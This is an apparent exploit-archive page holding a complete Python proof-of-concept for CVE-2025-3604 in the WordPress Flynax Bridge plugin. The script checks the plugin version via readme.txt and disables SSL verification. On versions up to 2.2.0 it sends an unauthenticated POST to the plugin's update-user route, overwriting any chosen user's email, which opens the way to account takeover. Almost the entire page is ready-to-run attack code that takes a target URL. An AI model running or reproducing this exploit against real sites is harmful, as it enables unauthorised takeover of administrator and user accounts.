4837 Total CVEs
26 Years
GitHub
Home / 2025 / CVE-2025-3604
README.md
Rendering markdown...
POC / CVE-2025-3604.py PY
⬇ Raw GitHub ✕ Close 
import argparse
import requests
import re
from urllib.parse import urljoin


#by Nxploited ( Khaled_alenazi )


def parse_arguments():
    """Parse command-line arguments."""
    parser = argparse.ArgumentParser(
        description="WordPress Flynax Bridge Unauthenticated Privilege Escalation via Account # By Nxploited (Khaled Alenazi)"
    )
    parser.add_argument("-u", "--url", required=True, help="Target URL")
    parser.add_argument("-mail", "--newmail", default="[email protected]", help="New email to set")
    parser.add_argument("-id", "--user_id", required=True, help="User ID to exploit")
    return parser.parse_args()


def validate_url(url):
    """Validate the URL format."""
    if not url.startswith("http://") and not url.startswith("https://"):
        raise ValueError("Invalid URL. Please include http:// or https://")
    return url


def disable_ssl_warnings():
    """Disable SSL warnings."""
    requests.packages.urllib3.disable_warnings()
    return {"verify": False}


def check_plugin_version(base_url, ssl_options):
    """Check the plugin version."""
    readme_url = urljoin(base_url, "wp-content/plugins/flynax-bridge/readme.txt")
    try:
        response = requests.get(readme_url, **ssl_options)
        if response.status_code == 200:
            match = re.search(r"Stable tag: ([\d\.]+)", response.text)
            if match:
                version = match.group(1)
                print(f"Detected plugin version: {version}")
                return version
    except Exception as e:
        print(f"Error checking plugin version: {e}")
    return None


def send_post_request(base_url, user_id, new_email, ssl_options):
    """Send POST request to exploit."""
    exploit_url = urljoin(base_url, "wp-content/plugins/flynax-bridge/request.php?route=update-user")
    data = {"ID": user_id, "user_email": new_email}
    headers = {
        "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36"
    }
    try:
        response = requests.post(exploit_url, data=data, headers=headers, **ssl_options)
        return response
    except Exception as e:
        print(f"Error sending POST request: {e}")
    return None


def execute_exploit(base_url, user_id, new_email, ssl_options):
    """Execute the exploit if conditions are met."""
    version = check_plugin_version(base_url, ssl_options)
    if version and version <= "2.2.0":
        print("Version is vulnerable. Attempting exploit...")
        response = send_post_request(base_url, user_id, new_email, ssl_options)
        if response and response.status_code == 200:
            print(f"Exploit succeeded! Email changed to: {new_email}")
            print("Exploit By Nxploited (Khaled_alenazi) | https://github.com/Nxploited")
        else:
            print("Exploit failed. Server returned an error.")
    else:
        print("Target is not vulnerable. Exploit aborted.")


def handle_errors(func):
    """Error handling decorator."""
    def wrapper(*args, **kwargs):
        try:
            return func(*args, **kwargs)
        except Exception as e:
            print(f"Error: {e}")
    return wrapper


@handle_errors
def main():
    """Main function to orchestrate the exploit."""
    args = parse_arguments()
    base_url = validate_url(args.url)
    ssl_options = disable_ssl_warnings()
    execute_exploit(base_url, args.user_id, args.newmail, ssl_options)


if __name__ == "__main__":
    main()